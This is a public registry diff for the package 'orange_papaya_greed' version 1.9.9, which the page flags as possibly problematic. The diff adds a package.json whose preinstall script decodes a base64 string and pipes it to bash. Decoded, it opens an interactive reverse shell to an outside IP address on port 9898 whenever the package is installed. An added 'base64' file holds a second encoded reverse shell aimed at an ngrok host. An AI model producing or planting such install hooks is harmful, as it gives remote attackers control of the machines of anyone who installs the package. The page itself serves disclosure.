orange_papaya_greed 1.9.9
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of orange_papaya_greed might be problematic. Click here for more details.
- package/base64 +1 -0
- package/index.js +3 -0
- package/package.json +12 -0
package/base64
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
YmFzaCAtaSA+JiAvZGV2L3RjcC9jODIyLTE2NS0yMzEtNjctMTk1Lm5ncm9rLmlvLzgwIDA+JjEK -d
|
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "orange_papaya_greed",
|
3
|
+
"version": "1.9.9",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTQuMjMzLjk2LjE3Mi85ODk4IDA+JjEK' | base64 -d | bash"
|
9
|
+
},
|
10
|
+
"author": "0xsapra",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|